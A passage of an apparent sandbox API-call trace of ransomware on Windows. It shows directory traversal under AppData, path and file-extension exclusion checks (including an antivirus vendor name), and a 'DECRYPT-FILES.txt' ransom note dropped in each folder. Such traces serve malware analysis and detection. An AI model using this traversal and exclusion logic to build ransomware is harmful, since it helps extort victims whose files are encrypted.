dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.752] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.752] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0079.752] lstrcmpW (lpString1="IECompatCache", lpString2=".") returned 1 [0079.752] lstrcmpW (lpString1="IECompatCache", lpString2="..") returned 1 [0079.752] lstrcatW (in: lpString1="IECompatCache", lpString2="\\" | out: lpString1="IECompatCache\\") returned="IECompatCache\\" [0079.752] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IECompatCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0079.752] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Program Files") returned 0x0 [0079.752] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch=":\\Windows") returned 0x0 [0079.752] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Games\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\All Users") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="AhnLab") returned 0x0 [0079.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0079.753] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.753] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\jkbimi8.tmp") returned 90 [0079.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0079.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0079.754] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.754] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt") returned 96 [0079.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0079.754] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0079.755] CloseHandle (hObject=0x454) returned 1 [0079.755] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0079.755] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0079.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0079.756] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.756] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.756] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.756] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.756] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbb3f60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.756] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.756] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbb3f60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.756] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.756] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.756] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.756] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.756] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.756] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0079.756] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.757] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0079.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\jkbimi8.tmp" [0079.757] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.757] CloseHandle (hObject=0x0) returned 0 [0079.757] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.757] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0079.757] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0079.757] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0079.757] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0079.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0079.757] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Program Files") returned 0x0 [0079.757] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch=":\\Windows") returned 0x0 [0079.757] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Games\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\All Users") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="AhnLab") returned 0x0 [0079.758] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.758] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0079.758] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.758] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\jkbimi8.tmp") returned 94 [0079.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0079.758] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0079.758] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.758] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt") returned 100 [0079.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0079.759] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0079.760] CloseHandle (hObject=0x45c) returned 1 [0079.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0079.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0079.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0079.761] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.761] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.761] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbda0c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.761] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.761] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbb3f60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.761] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.761] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.761] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.762] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.762] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0079.762] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.762] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0079.762] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\jkbimi8.tmp" [0079.762] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.762] CloseHandle (hObject=0x0) returned 0 [0079.762] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.762] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbb3f60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0079.762] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0079.762] CloseHandle (hObject=0x458) returned 1 [0079.763] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0079.763] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0079.763] CloseHandle (hObject=0x450) returned 1 [0079.763] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0079.763] lstrcmpW (lpString1="IETldCache", lpString2=".") returned 1 [0079.763] lstrcmpW (lpString1="IETldCache", lpString2="..") returned 1 [0079.763] lstrcatW (in: lpString1="IETldCache", lpString2="\\" | out: 